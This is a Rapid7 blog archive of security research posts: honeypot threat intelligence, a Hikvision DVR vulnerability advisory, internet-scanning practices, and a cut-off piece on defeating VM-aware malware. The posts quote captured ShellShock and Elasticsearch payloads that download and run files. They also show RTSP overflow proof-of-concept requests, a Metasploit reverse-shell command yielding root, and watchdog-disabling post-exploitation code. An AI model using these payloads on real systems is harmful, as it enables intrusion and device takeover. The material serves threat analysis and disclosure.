Rapid7 Blog




12 Days of HaXmas: Beginner Threat Intelligence with Honeypots

This post is the 12th in the series, "12 Days of HaXmas." So the Christmas season is here, and between ordering gifts and drinking Glühwein what better way to spend your time than sieve through some honeypot / firewall / IDS logs and try to…

This post is the 12th in the series, "12 Days of HaXmas." So the Christmas season is here, and between ordering gifts and drinking Glühwein what better way to spend your time than sieve through some honeypot / firewall / IDS logs and try to make sense of it, right? At Rapid7 Labs, we're not only scanning the internet, but also looking at who out there is scanning by making use of honeypot and darknet tools. More precisely we're running a couple of honeypots spread around the world and collecting raw traffic PCAP files with something similar to tcpdump (just slightly more clever). This post is just a quick log of me playing around with some of the honeypot logs. Most of what I'm doing here is happening in one of our backend systems as well, but I figured it might be cool to explain this by doing it manually. Some background The honeypot is fairly simple, it waits for incoming connections and then tries to figure out what to do with it. It might need to treat it as a SSL/TLS connection, or just a plain HTTP request. Depending on the incoming protocol, it will try to answer in a meaningful way. Even with some very basic honeypot that just opens a port and waits for requests, you will quickly find things like this: GET /_search?source={"query":+{"filtered":+{"query":+{"match_all":+{}}}},+"script_fields":+{"exp":+{"script":+"import+java.util.*;import+java.io.*;String+str+=+\"\";BufferedReader+br+=+new+BufferedReader(new+InputStreamReader(Runtime.getRuntime().exec(\"wget+-O+/tmp/zldyls+\").getInputStream()));StringBuilder+sb+=+new+StringBuilder();while((str=br.readLine())!=null){sb.append(str);sb.append(\"\r\n\");}sb.toString();"}},+"size":+1} HTTP/1.1 Host: redacted:9200 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: */* User-Agent: python-requests/2.4.1 CPython/2.7.8 Windows/2003Server or this: GET HTTP/1.1 HTTP/1.1 Accept: */* Accept-Language: en-us Accept-Encoding: gzip, deflate User-Agent: () { :;};/usr/bin/perl -e 'print "Content-Type: text/plain\r\n\r\nXSUCCESS!";system("cd /tmp;cd /var/tmp;rm -rf .c.txt;rm -rf .d.txt ; wget ; curl -O ; fetch ; lwp-download; chmod +x .c.txt* ; sh .c.txt* ");' Host: redacted Connection: Close What we're looking at are ElasticSearch (slightly modified as the path was URL decoded for better readability) and ShellShock exploit attempts. One can quickly see that the technique is fairly straightforward - there's a specific exploit that allows you to run commands. In these cases, the attackers are just running some straightforward shell commands in order to download a file (by any means necessary) and execute it. You can find several writeups around these exploitation attempts and the botnets behind it one the web (e.g. [1], [2], [3]). Now because of this common pattern, our honeypot does some basic pattern matching and extracts any URL or command that it finds in the request. If there's a URL (inside a wget/curl/etc command), it will then try to download that file. We could also do this at post-processing stage, but by then the URL might not be available any more as these things tend to disappear or get taken down quickly. Looking at the unique files from the last half year (roughly) we can count following file-types (reduced/combined for readability): 178 ELF 32-bit LSB executable Intel 80386 66 a /usr/bin/perl script ASCII text executable 33 Bourne-Again shell script ASCII text executable 14 POSIX tar archive (GNU) 14 ELF 64-bit LSB executable x86-64 4 ELF 32-bit LSB executable MIPS 2 ELF 32-bit LSB executable ARM 1 ELF 32-bit MSB executable PowerPC or cisco 4500 1 ELF 32-bit MSB executable MIPS 1 OpenSSH DSA public key Typically the attacker is uploading a compiled malware binary. In some cases it's a shell script that will in turn download the next stage. And as we can see there's at least one case of an SSH public key that was uploaded - simple but effective. Also noteworthy is the targetting of quite a few different architectures. These are mostly binaries for embedded routers and for example the QNAP devices that are vulnerable to ShellShock. Getting started on the logs What kind of logs are we looking at? Mostly, our honeypot emits events like "there was a connection" or "i found a URL in a request" and "i downloaded a file from a URL". The first step is to grab a bunch of these events (a few thousand) and apply some geolocation to them (see DAP) (again, modified for better readability): $ cat logs | dap json + geoip sensor + geoip source + remove some + rename some + json { "ref": "conn-d7a38178-0520-49db-a79a-688f5ded5998", "utcts": "2015-12-13T07:36:59.444356Z", "sha1": "3eeb2eb0fdf9e4140277cbe4ce1149e57fae1fc9", "url": "http://ys-k.ys168.com/2.0/475535157/jRSKjUt4H535F3XKNTV/pycn.zuc", "url.netloc": "ys-k.ys168.com", "source": "", "source.country_code": "CN", "sensor": "redacted", "sensor.country_code": "JP", "dport": 9200, "http.agent": "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)", "http.method": "POST", "vulns": "VULN-ELASTICSEARCH-RCE,CVE-2014-3120,EXEC-SHELLCMD", } ... Now we can take these logs and do some correlatation, creating one record per "attack". We also add a couple more data sources (ASN lookup, filetypes for the downloaded files, etc). For the sake of this post, let's focus on the attacks which lead to downloadable files and that we could categorize as shellshock / elasticsearch exploits. By writing a quick formatting script that does some counting of fields we get something pretty like this (using python prettytable) (full version): +-----------------+-------+-------------------+---------------+------------+------------+-----------------------------+-----------------------------------------------+--------------------------------------------------------------------------------+ | key | count | seen | sensorcountry | dport | httpmethod | vulns | sha1 | url | +-----------------+-------+-------------------+---------------+------------+------------+-----------------------------+-----------------------------------------------+--------------------------------------------------------------------------------+ | | 89 | first: 2015-08-05 | 54x US | 89x 9200 | 89x GET | 89x VULN-ELASTICSEARCH-RCE | 88x 53c458790384b9c33acafaa0c6ddf9bcbf35997e | 84x | | CN | | last: 2015-08-08 | 14x JP | | | CVE-2014-3120 | 1x b6bb2b7cad3790887912b6a8d2203bebedb84427 | 4x | | AS 4134 | | | 10x AU | | | EXEC-SHELLCMD | | 1x | | | | | 5x IE | | | | | | | | | | 3x SG | | | | | | | | | | 3x BR | | | | | | +-----------------+-------+-------------------+---------------+------------+------------+-----------------------------+-----------------------------------------------+--------------------------------------------------------------------------------+ | | 87 | first: 2015-05-06 | 55x US | 87x 9200 | 87x GET | 87x VULN-ELASTICSEARCH-RCE | 87x f7b229a46b817776d9d2c1052a4ece2cb8970382 | 72x | | CN | | last: 2015-05-27 | 15x SG | | | CVE-2014-3120 | | 15x | | AS23650 | | | 11x AU | | | EXEC-SHELLCMD | | | | | | | 4x JP | | | | | | | | | | 2x IE | | | | | | +-----------------+-------+-------------------+---------------+------------+------------+-----------------------------+-----------------------------------------------+--------------------------------------------------------------------------------+ | | 63 | first: 2015-10-26 | 21x IE | 63x 9200 | 63x POST | 63x VULN-ELASTICSEARCH-RCE | 48x 3eeb2eb0fdf9e4140277cbe4ce1149e57fae1fc9 | 18x http://ys-f.ys168.com/2.0/475535129/gUuMfKl6I345M2KKMN3L/hgfd.pzm | | CN | | last: 2015-10-27 | 11x US | | | CVE-2014-3120 | 15x 139033fef5a1dacbd5764e47f1403ebdf6bd854e | 15x http://ys-m.ys168.com/2.0/475535116/j5I614N5344N6HhSvKVs/pua.kfc | | AS 9808 | | | 9x JP | | | EXEC-SHELLCMD | | 15x http://ys-j.ys168.com/2.0/475535140/l5I614M7456NM1hVsIxw/ggg.vip | | | | | 8x AU | | | | | 9x http://ys-d.ys168.com/2.0/475535151/jRtNjKj7K426K6IH6PLK/wsy.sto | | | | | 8x SG | | | | | 5x | | | | | 6x BR | | | | | 1x http://ys-f.ys168.com/2.0/475535137/iTwHtWk4H537H4685MMK/mmml.bbt | +-----------------+-------+-------------------+---------------+------------+------------+-----------------------------+-----------------------------------------------+--------------------------------------------------------------------------------+ | | 50 | first: 2015-11-05 | 23x US | 50x 80 | 50x GET | 50x VULN-SHELLSHOCK | 37x 21762efb4df7cbb6b2331b34907817499f53be99 | 37x | | MX | | last: 2015-12-02 | 22x AU | | | CVE-2014-6271 | 4x 4172d5b70dfe4f5be3aaeb4b2b78fa230a27b97e | 4x | | AS 8151 | | | 5x BR | | | | 4x 3a33f909c486406773b06d8da3b57f530dd80de6 | 4x | | | | | | | | | 3x ebbe8ebb33e78348a024f8afce04ace6b48cc708 | 3x | | | | | | | | | 2x 3caf6f7c6f4953b9bbba583dce738481da338ea7 | 2x | +-----------------+-------+-------------------+---------------+------------+------------+-----------------------------+-----------------------------------------------+--------------------------------------------------------------------------------+ ... With my test dataset of roughly 2000 "attacks with downloads" this leads to 195 unique sources, that make use of several drop URLs and payloads over the course of a couple months. Basic Threat Intelligence Beyond simple correlation by source IP, we can now try to organize this data into some groups - basically trying to correlate several attack sources together based on the payloads and drop sites they use. In addition there are also more in-depth methods like analyzing the malware samples and coming up with specific indicators that allow you to group the binaries together even further. The problem though is that manually doing this grouping is painful, as it's not enough to go one level deep. A source that uses a couple binaries which are also used from another source is the first layer. But then those sources already had their own binaries and URLs, and so on and so forth. Basically it comes down to a simple graph traversal. The individual data points like an attacker ip, a file hash, a drop host ip/name, etc can be viewed as nodes in a graph that have relationships with each other. All connected subgraphs within this graph make up our "groups" / attacker categories. If you create a graph for our honeypot data set, it looks like this: So to categorize our incidents into attacker groups we build up these subgraphs by writing a graph traversal function. We correlate attackers based on binaries used, hosts used for downloading payloads and hosts contacted by the malware samples themselves (sadly didn't get to do this for all of them). GRAPH = collections.defaultdict(set) def add_edge(fr, to): # undirected GRAPH[fr].add(to) GRAPH[to].add(fr) def graph_traversal(src): visited = set([src]) queue = [src,] while queue: parent = queue.pop(0) children = GRAPH[parent] for child in children: if child not in visited: yield parent, child visited.add(child) queue.append(child) for e in DATA: src = ("source", e["source"]) payload = ("payload", e["sha1"]) payloadsrc = ("payloadsrc", e["url.netloc"]) add_edge(src, payload) add_edge(payload, payloadsrc) for i in e.get("mal.tcplist", []): add_edge(payload, ("c2", i)) n = 1 seen = set() for src in set(e["source"] for e in DATA): if src in seen: continue members = set() indicators = set() for (ta, va), (tb, vb) in graph_traversal(("source", src)): if ta == "source": members.add(va) else: indicators.add((ta, va)) if tb == "source": members.add(vb) else: indicators.add((tb, vb)) print json.dumps(dict(members=list(members), indicators=list(indicators), group=n)) n += 1 seen |= members This leads to 81 groups, as shown by the next table (full version): +-----+-------+-------------------+----------------------+---------------+---------------+---------------+------------+------------+-----------------------------+-----------------------------------------------+--------------------------------------------------------------------------------+ | key | count | seen | source | sourcecountry | srcasn | sensorcountry | dport | httpmethod | vulns | sha1 | url | +-----+-------+-------------------+----------------------+---------------+---------------+---------------+------------+------------+-----------------------------+-----------------------------------------------+--------------------------------------------------------------------------------+ | 3 | 224 | first: 2015-04-09 | 144x | 210x CN | 144x AS37963 | 84x US | 224x 9200 | 158x POST | 224x VULN-ELASTICSEARCH-RCE | 143x 4db1c73a4a33696da9208cc220f8262fb90767af | 65x | | | | last: 2015-12-13 | 31x | 14x KR | 66x AS23650 | 44x IE | | 66x GET | CVE-2014-3120 | 81x 2b1f756d1f5b1723df6872d5727bf55f94c7aba9 | 53x | | | | | 14x | | 14x AS 4766 | 26x JP | | | EXEC-SHELLCMD | | 28x | | | | | 14x | | | 26x SG | | | | | 16x | | | | | 8x | | | 23x AU | | | | | 13x | | | | | 7x | | | 21x BR | | | | | 7x | | | | | 5x | | | | | | | | 7x | | | | | 1x | | | | | | | | 7x | | | | | | | | | | | | | 6x | | | | | | | | | | | | | 5x | | | | | | | | | | | | | 4x | | | | | | | | | | | | | 4x | | | | | | | | | | | | | 3x | | | | | | | | | | | | | 3x | | | | | | | | | | | | | 3x | +-----+-------+-------------------+----------------------+---------------+---------------+---------------+------------+------------+-----------------------------+-----------------------------------------------+--------------------------------------------------------------------------------+ | 12 | 23 | first: 2015-11-17 | 9x | 19x US | 9x AS36352 | 18x US | 15x 80 | 15x GET | 15x VULN-SHELLSHOCK | 8x 81b65f4165a6b0689c3e7212ccf938dc55aae1bf | 8x | | | | last: 2015-12-13 | 4x | 2x TR | 4x AS55286 | 3x AU | 8x 9200 | 8x POST | CVE-2014-6271 | 8x c30026c548cd45be89c4fb01aa6df6fd733de964 | 2x | | | | | 4x | 1x CA | 4x AS 8100 | 1x JP | | | 8x VULN-ELASTICSEARCH-RCE | 5x fe01a972a63f754fed0322698e16b2edc933f422 | 2x | | | | | 2x | 1x DE | 2x AS43391 | 1x BR | | | CVE-2014-3120 | 2x 05f32da77a9c70f429c35828d73d68696ca844f2 | 2x | | | | | 1x | | 1x AS30083 | | | | EXEC-SHELLCMD | | 2x | | | | | 1x | | 1x AS32613 | | | | | | 1x | | | | | 1x | | 1x AS24940 | | | | | | 1x | | | | | 1x | | 1x AS33387 | | | | | | 1x | | | | | | | | | | | | | 1x | | | | | | | | | | | | | 1x | | | | | | | | | | | | | 1x | | | | | | | | | | | | | 1x | +-----+-------+-------------------+----------------------+---------------+---------------+---------------+------------+------------+-----------------------------+-----------------------------------------------+--------------------------------------------------------------------------------+ | 13 | 42 | first: 2015-04-23 | 22x | 22x US | 22x AS27176 | 14x US | 21x 10000 | 42x GET | 42x VULN-QNAP-SHELLSHOCK | 12x 37c5ca684c2f7c9f5a9afd939bc2845c98ef5853 | 20x | | | | last: 2015-04-27 | 20x | 20x NL | 20x AS58073 | 10x IE | 18x 7778 | | | 12x 3e4e34a51b157e5365caa904cbddc619146ae65c | 12x | | | | | | | | 8x SG | 3x 8080 | | | 7x 9d3442cfecf6e850a2d89d2817121e46f796a1b1 | 7x | | | | | | | | 7x BR | | | | 7x 9851bcec479204f47a3642177c75a16b58d44c20 | 3x | | | | | | | | 3x AU | | | | 3x 1a412791a58dca7fc87284e208365d36d19fd864 | | | | | | | | | | | | | 1x d538717c89943f42716c139426c031a21b83c236 | | What else? As mentioned before, this can be done in much more detail, by analyzing the samples further and extracting better/more indicators than the contacted C2 hosts. Also there probably is more data around the hosts / domains used for the drop sites (payload URLs) that could potentially be used to correlate different sets. If we're taking some of the hosts/ips from above and use it to query Project Sonar we'll get dns records, open ports and certificate information: address had port 80/tcp open address was seen in DNS A record for 58559.url.dnspud.com address was seen in DNS A record for cc365cc-com-2015-7.com saw cert 93e5ad9fdf4c9a432a2ebbb6b0e5e0a055051007 on endpoint address was seen in DNS A record for www.investorfinder.de address was seen in DNS A record for teafortwohearts.com address had port 80/tcp open address had port 993/tcp open address was seen in DNS A record for peoplesblueprint.ca address had DNS PTR record hn.kd.ny.adsl address was seen in DNS A record for jilijia.net address was seen in DNS A record for cxyt.org elbinvestment.com had a DNS a record with value address was seen in DNS A record for www.lerhe.com saw cert 25907d81d624fd05686111ae73372068488fcc6a on endpoint ys-f.ys168.com had a DNS A record pointing to IP address had port 995/tcp open address had port 465/tcp open address was seen in DNS A record for school88le.com ... Following this data / or adding it into the graph can yield some interesting results - but it's also of lower "quality" as most of the infrastructure used by the attackers probably consists of compromised systems and has lots of other use and thus there's a lot of noise around the activity of the attacker. Summing up Looking through these datasets can be fun but also a bit tricky at times. Command-line kungfu and some scripting can help pivot around the dataset if you don't want to put the effort in of using a database and something like SQL queries. Incident data and threat intelligence indicators quite often match the graph data model well and thus we can use of simple graph traversal functions or even a real graph database to analyze our data. In order to analyze most of the samples I implemented Linux support in Cuckoo Sandbox. Available in the current development branch - follow us closely for the release of the next version! Another noteworthy point is that honeypots can still yield some fun (not so much interesting) data nowadays. With internet scanning becoming more popular and easy to do, a few low-skill shotgun-type attackers are joining the game and try to get quick wins by running mass exploitation runs. Rapid7 Labs is always interested in similar stories if you are willing to share them and let us know what you think in the comments! Also feel free to tweet me personally @repmovsb. Happy HaxMas! -Mark References: [1] CARISIRT: Defaulting on Passwords (Part 1): r0_bot | CARI.net Blog [2] Malware Must Die!: MMD-0030-2015 - New ELF malware on Shellshock: the ChinaZ [3] Malware Must Die!: MMD-0032-2015 - The ELF ChinaZ "reloaded"

R7-2014-18: Hikvision DVR Devices - Multiple Vulnerabilities

Rapid7 Labs has found multiple vulnerabilities in Hikvision DVR (Digital Video Recorder) devices such as the DS-7204 and other models in the same product series that allow a remote attacker to gain full control of the device. More specifically, three typical buffer overflow vulnerabilities were…

Rapid7 Labs has found multiple vulnerabilities in Hikvision DVR (Digital Video Recorder) devices such as the DS-7204 and other models in the same product series that allow a remote attacker to gain full control of the device. More specifically, three typical buffer overflow vulnerabilities were discovered in Hikvision's RTSP request handling code: CVE-2014-4878, CVE-2014-4879 and CVE-2014-4880. This blog post serves as disclosure of the technical details for those vulnerabilities. In addition, a remote code execution through a Metasploit exploit module has been published. Vulnerability Summary After starting Project Sonar in 2013, Rapid7 Labs started investigating several protocols, services and devices that are popular on the internet, in order to find and raise awareness about widespread misconfigurations and vulnerabilities. One category of these devices are so called "Digital Video Recorders" or sometimes "Network Video Recorders". Typically they are used to record surveillance footage of office buildings and surrounding areas or even private properties. Sieving through our Sonar datasets, several vendors and families of these devices turned up, but the Hikvision models in particular are very popular and widespread across the public IPv4 address space with around 150,000 devices remotely accessible. Speculating about reasons for this popularity, one could argue that the iPhone app which can view the surveillance streams remotely, is very appealing to a lot of customers. Now apart from the fact that these devices come with a default administrative account "admin" with password "12345", it also contains several quickly found vulnerabilities that ultimately lead to full remote compromise. During our initial analysis we found three different buffer overflow vulnerabilties in the RTSP request handler: [CVE-2014-4878] To execute arbitrary code without authentication by exploiting a buffer overflow in the RTSP request body handling [CVE-2014-4879] To execute arbitrary code without authentication by exploiting a buffer overflow in the RTSP request header handling [CVE-2014-4880] To execute arbitrary code without authentication by exploiting a buffer overflow in the RTSP basic authentication handling CVE-2014-4878 - Buffer Overflow in the RTSP Request Body Handling The RTSP request handler uses a fixed size buffer of 2048 bytes for consuming the HTTP request body, which leads to a buffer overflow condition when sending a larger body. This most likely can be exploited for code execution, however we just present a Denial-of-Service proof here: request = "PLAY rtsp://%s/ RTSP/1.0\r\n" % HOST request += "CSeq: 7\r\n" request += "Authorization: Basic AAAAAAA\r\n" request += "Content-length: 3200\r\n\r\n" request += "A"*3200 CVE-2014-4879 - Buffer Overflow in the RTSP Request Header Handling The RTSP request handler uses fixed size buffers when parsing the HTTP headers, which leads to a buffer overflow condition when sending a large header key. This most likely can be exploited for code execution, however we just present a Denial-of-Service proof here: request = "PLAY rtsp://%s/ RTSP/1.0\r\n" % HOST request += "Authorization" request += "A" * 1024 request += ": Basic AAAAAAA\r\n\r\n" CVE-2014-4880 - Buffer Overflow in the RTSP Basic Authentication Handling The Metasploit module written for the vulnerability sends a crafted RTSP request that triggers a buffer overflow condition when handling the "Basic Auth" header of a RTSP transaction. Due to this condition the request takes control of the remote instruction pointer and diverts execution to a series of ROP gadgets that pivot the stack to an area within the request packet itself in order to continue execution there. The code placed in this area in the case below is a standard reverse shellcode generated by Metasploit. ./msfcli exploit/linux/misc/hikvision_rtsp_bof payload=linux/armle/shell_reverse_tcp RHOST= LHOST= SHELL=/bin/sh SHELLARG=sh E [*] Initializing modules... payload => linux/armle/shell_reverse_tcp RHOST => LHOST => SHELL => /bin/sh SHELLARG => sh [*] Started reverse handler on [*] Command shell session 1 opened ( -> at 2014-09-15 18:09:03 +0200 id uid=0(root) gid=0(root) No authentication is required to exploit this vulnerability and the Metasploit module successfully demonstrates gaining full control of the remote device. Hikvision Reboot Watchdog - Post Exploitation The firmware implements a watchdog functionality in form of a kernel module which can be contacted through the /dev/watchdog device node. The main binary opens this node and writes one byte to it every two seconds. If that behavior stops, the kernel module reboots the device. To stop this, one can issue an ioctl to disable the watchdog functionality after getting into the system, with the following ioctl: int one = 1; int fd = open("/dev/watchdog", 2); int ret = ioctl(fd, 0x80045704, &one); After running this on the device, either as part of the shellcode or as a post-exploitation stage, the watchdog does not reboot the device anymore. Vendor Analysis, Solutions and Workarounds The device under test was a Hikvision-DS-7204-HVI-SV digital video recorder device with firmware V2.2.10 build 131009 (Oct 2013). Other devices in the same model range are affected too, however, we do not have an exhaustive list of firmware versions and models. Prior to this research, CVE-2013-4977 was discovered by Anibal Sacco and Federico Muttis from Core Exploit Writers Team, affecting multiple Hikvision devices. We confirmed the device under test for this advisory is still vulnerable to their attack. Given the presence of this prior vulnerability in the analyzed DVR device, we believe that it is likely that all products offering identical features are affected by these issues. Hikvision provided no response to these issues after several attempts to contact them. In order to mitigate these exposures, until a patch is released, Hikvision DVR devices and similar products should not be exposed to internet without the usual additional protective measures, such as an authenticated proxy, VPN-only access, et cetera. Sidenote on previous compromise of DVRs by Malware Earlier this year researchers from SANS found a botnet consisting mostly of DVR devices and routers which does bitcoin mining as one of it's main purposes. This botnet used default credentials to compromise the devices and while we don't have any statistics on the number of infected devices, we assume that a relatively high percentage of devices actually still has the default password configured. However, more widespread exploitation possibilities not only on DVRs but also other embedded devices could lead to a larger botnet that subsequently poses a larger threat to the rest of the internet. Vulnerability Disclosure Timeline and Researcher Credit CVE-2014-4878, CVE-2014-4879 and CVE-2014-4880 were discovered and researched by Mark Schloesser from Rapid7 Labs Disclosure Timeline: Sep 15, 2014: Vendor contacted Oct 06, 2014: Disclosure to CERT/CC Oct 09, 2014: CVE identifiers assigned Nov 19, 2014: Public disclosure Nov 19, 2014: Metasploit module for CVE-2014-4880 published as PR 4235 Nov 19, 2014: Nexpose coverage for CVE-2014-4878, CVE-2014-4879 and CVE-2014-4880 added

Scanning All The Things

IntroductionOver the past year, the Rapid7 Labs team has conducted large scale analysis on the data coming out of the Critical.IO and Internet Census 2012 scanning projects. This revealed a number of widespread security issues and painted a gloomy picture of an internet rife…

IntroductionOver the past year, the Rapid7 Labs team has conducted large scale analysis on the data coming out of the Critical.IO and Internet Census 2012 scanning projects. This revealed a number of widespread security issues and painted a gloomy picture of an internet rife with insecurity. The problem is, this isn't news, and the situation continues to get worse. Rapid7 Labs believes the only way to make meaningful progress is through data sharing and collaboration across the security community as a whole.  As a result, we launched Project Sonar at DerbyCon 3.0 and urged the community to get involved with the research and analysis effort. To make this easier, we highlighted various free tools and shared a huge amount of our own research data for analysis.Below is a quick introduction to why internet-wide scanning is important, its history and goals, and a discussion of the feasibility and present best practices for those that want to join the party.Gain visibility and insightA few years ago internet-wide surveys were still deemed unfeasible, or at least too expensive to be worth the effort. There have been only a few projects that mapped out aspects of the internet - for example the IPv4 Census published by the University of Southern California in 2006. The project sent ICMP echo requests to all IPv4 addresses between 2003 and 2006 to collect statistics and trends about IP allocation. A more recent example of such research is the Internet Census 2012, which was accomplished through illegal means by the "Carna Botnet," which consisted of over 420,000 infected systems.The EFF SSL Observatory investigated "publicly-visible SSL certificates on the Internet in order to search for vulnerabilities, document the practices of Certificate Authorities, and aid researchers interested the web's encryption infrastructure". Another case of widespread vulnerabilities in Serial Port Servers was published by HD Moore based on data from the Critical.IO internet scanning project.The EFF Observatory, and even the botnet-powered Internet Census data, helps people understand trends and allows researchers to prioritize research based on the actual usage of devices and software. Raising awareness about widespread vulnerabilities through large-scale scanning efforts yields better insight into the service landscape on the Internet, and hopefully allows both the community and companies to mitigate risks more efficiently.We believe that scanning efforts will be done by more people in the future and we consider it to be valuable to both researchers and companies. Research about problems / bugs raises awareness and companies gain visibility about their assets. Even though probing/scanning/data collection can be beneficial, there are dangers to it and it should always be conducted with care and using best practices. We provide more information on that below - and we will share all our data with the community to reduce data duplication and bandwidth usage among similar efforts.Feasibility and costsAs mentioned, this kind of research was once considered to be very costly or even unfeasible. The Census projects either ran over a long time (2 months) or used thousands of devices. With the availability of better hardware and clever software, internet-wide scanning has become much easier and cheaper in recent years. The ZMap open source network scanner was built for this purpose and allows a GbE connected server to reach the entire Internet - all IPv4 - addresses - within 45 minutes. It achieves this by generating over a million packets per second if configured to use the full bandwidth. Of course this requires the hardware to be able to reach that throughput in packets and response processing. Other projects go even further - Masscan generates 25 million packets per second using dual 10 GE links and thus could reach the entire address space in 3 minutes.So this means that technically one can do Internet-wide scans with a single machine - if the hardware is good enough. Of course this is not the only requirement - a couple others are needed as well.The network equipment at the data center needs to be able to cope with the packet ratesThe hosting company or ISP needs to allow this kind of action on their network (terms of service)As "port scanning" is considered to be an "attack" by a large amount of IDSs and operators, this activity will generate a lot of abuse complaints to the hoster/ISP and you. Thus one needs to notify the hoster beforehand and agree on boundaries, packet rates, bandwidth limits and their view on abuse complaints.Especially the network equipment and abuse handling process are things that are difficult to determine beforehand. We went through a couple of options before we were able to establish a good communication channel with our hosters and thus allowed to conduct this kind of project using their resources. We saw network equipment failing at packet rates over 100k/sec, high packet loss in others at rates over 500k/sec and had hosters locking our accounts even after we notified them about the process beforehand.Settings and resource recommendationsWe decided that for most scans it is actually not that important to bring the duration to below a few hours. Of course one might not get a real "snapshot" of the Internet state if the duration is longer - but the trade-off regarding error-rates, packet loss and impact on remote networks outweighs the higher speed by far in our opinion.Always coordinate with the hosting company / ISP - make sure they monitor their equipment health and throughput and define limits for youDon't scan unrouted (special) ranges within the IPv4 address space - the Zmap project compiled a list of these (also to be found on Wikipedia)Benchmark your equipment before doing full scans - we list some recommendations below, but testing is keyDon't exceed 500k packets per second on one machine - this rate worked on most of the dedicated servers we tested and keeps scan time around 2 hours (still needs coordination with the hoster)Distribute work across multiple source IPs and multiple source hosts - this reduces abuse complaints and allows you to use lower packet rates to achieve the same scan duration (lower error-rate)When virtual machines are used keep in mind I/O delays due to the virtualization layer - use lower packet rates < 100k/sec (coordinate with hoster beforehand)If possible, randomize target order to reduce loads on individual networks (Zmap provides this feature in a clever way)Best practicesIf one plans to do Internet wide scanning, maybe the most important aspect is to employ best practices and not interfere with availability of resources of others. The ZMap project put together a good list of these - and we summarize it here for the sake of completeness:Coordinate not only with the hosting company but also with abuse reporters and other network maintainersReview any applicable laws in your country/state regarding scanning activity - possibly coordinate with law enforcementProvide possible opt-out for companies / network maintainers and exclude them from further scanning after a requestExplain scanning purpose and project goals clearly on a website (or similar) and refer involved people to itReduce packet rates and scan frequencies as much as possible for your research goal to reduce load and impact on networks and peopleImplementation detailsAfter covering the theoretical background and discussing goals and best practices, we want to mention a few of our implementation choices.For port scanning we make use of the before-mentioned excellent Zmap software. The authors did a great job on the project and the clever IP randomization based on iterating over a cyclic group reduces load and impact on networks while still keeping very little state. Despite Zmap providing almost everything needed, we just use it as a Syn-scanner and do not actually implement probing modules within Zmap. The reachable hosts / ports are collected from Zmap and then processed on other systems using custom clients or possibly even Nmap NSE scripts - depending on the scan goal.So as an example, for downloading SSL/TLS certificates from https webservers, we do a 443/TCP Zmap scan and feed the output to a couple of other systems that immediately connect to those ports and download the certificates.  This choice allowed us to implement simple custom code that is able to handle SSLv2 and the latest TLS at the same time. As we see slightly below 1% of the Internet having port 443 open, we have to handle around 5000 TCP connections per second when using Zmap with 500k packets per second. These 5000 TCP connections per second are distributed across a few systems to reduce error-rates.As another example serves our DNS lookup job. When looking up massive amounts of DNS records (for example all common names found in the certificates) we use a relatively high amount of virtual machines across the world to reduce load on the DNS resolvers. In the implementation we use the excellent c-ares library from the cURL project. You can find our mass DNS resolver using c-ares in Python here.ConclusionIn our opinion visibility into publicly available services and software is lacking severely. Research like the EFF observatory leads to better knowledge about problems and allows us to improve the security of the Internet overall. Datasets from efforts such as the Internet Census 2012, even though obtained through illegal means, provide fertile ground for researchers to find vulnerabilities and misconfigurations. If we were able to obtain datasets like this on a regular basis through legal means and without noticeable impact on equipment, it would allow the security community to research trends, statistics and problems of our current public Internet.Companies can also use these kinds of datasets to gain visibility into their assets and public facing services. They can reduce risks of misconfiguration and learn about common problems with devices and software.We intend to coordinate with other research institutions and scanning projects to be able to provide the data to everyone. We want to establish boundaries and limits of rates and frequencies for the best practices in order to reduce the impact of this kind of research on networks and IT staff.By leveraging the data, together we can hopefully make the Internet a little safer in the future.

Vaccinating systems against VM-aware malware

The neverending fight with malware forced researchers and security firms to develop tools and automated systems to facilitate the unmanageable amount of work they've been facing when dissecting malicious artifacts: from debuggers, monitoring tools to virtualized systems and sandboxes. On the other side, malware authors…

The neverending fight with malware forced researchers and security firms to develop tools and automated systems to facilitate the unmanageable amount of work they've been facing when dissecting malicious artifacts: from debuggers, monitoring tools to virtualized systems and sandboxes. On the other side, malware authors quickly picked them up as easy indicators of anomalies from their target victims' systems. This has initiated a still ongoing arms race between malware writers and malware analysts, during which a lot of new tricks and technologies that came up were respectively defused by the opposite side: an anti-debugging mechanism can be evaded by hiding the debugger, detection of a virtualization software could possibly be defeated by choosing another product, obfuscation can be reversed with plugins for static analysis tools and dead code eliminated with differential debugging. So basically whenever a new "anti" functionality appears in malware, researchers try to adapt their methods to evade or defeat it. However there is a trade-off in this arms race: often we can more easily classify an executable as malicious by the detection/evasion it implements. If the detection mechanism has false positives, the attacker could miss out on potential victims. With malware analysis sandboxes and virtualization becoming increasingly popular for automated analysis and processing of suspicious files, the adoption of anti-virtualization technigues by malware authors is becoming just as common. As sandbox developers ourselves this can get quite frustrating, but what if we subvert this trend to our advantage? If all workstations in a company would look like virtualized analysis environments, they would not get infected by most VM-aware malware. Consequently we could use this as proactive countermeasure by placing common indicators into our systems and thereby "vaccinate" them against a large amount of malware. We could also increase our chances by introducing fake indicators of debuggers or other analysis tools. As an example, the screenshot on the right shows the output of "pafish", a tool that checks for artifacts typical of a virtualized environment. After putting several indicators into place, pafish detects them successfully. One can find these detection and evasion features in several malware families. Looking at an instance of the "Rebhip" trojan, we find several of these methods being used as shown in the flow graph below. After identifying one of the malware's string comparison functions we can trace its usage and quickly verify that it compares running process names against "VBoxService.exe" as one of its detection techniques. ... call from 0x407819 strcmp("VBOXSERVICE.EXE", "[SYSTEM PROCESS]") = 0 call from 0x407819 strcmp("VBOXSERVICE.EXE", "SYSTEM") = 0 call from 0x407819 strcmp("VBOXSERVICE.EXE", "SMSS.EXE") = 0 call from 0x407819 strcmp("VBOXSERVICE.EXE", "CSRSS.EXE") = 0 call from 0x407819 strcmp("VBOXSERVICE.EXE", "WINLOGON.EXE") = 0 call from 0x407819 strcmp("VBOXSERVICE.EXE", "SERVICES.EXE") = 0 call from 0x407819 strcmp("VBOXSERVICE.EXE", "LSASS.EXE") = 0 call from 0x407819 strcmp("VBOXSERVICE.EXE", "VBOXSERVICE.EXE") = 1 call from 0x40d6fc ExitProcess Therefore in a VirtualBox virtual machine with guest utilities installed, this specific malware sample would not conduct any malicious activity in order to evade automated analysis. Also using a debugger without hiding its presence will have the same effect. Building a small proof-of-concept tool for placing similar indicators can be trivial. We put together an example that contains a few VirtualBox and VMWare indicators and pushed it to a Github repository. It installs a few registry keys, directories, files and spawns some processes with names related to these products as well as a fake Olly Debugger. The repository has a built binary as well. This idea is by no means new or unique - others have used similar approaches before. Tillmann Werner and Felix 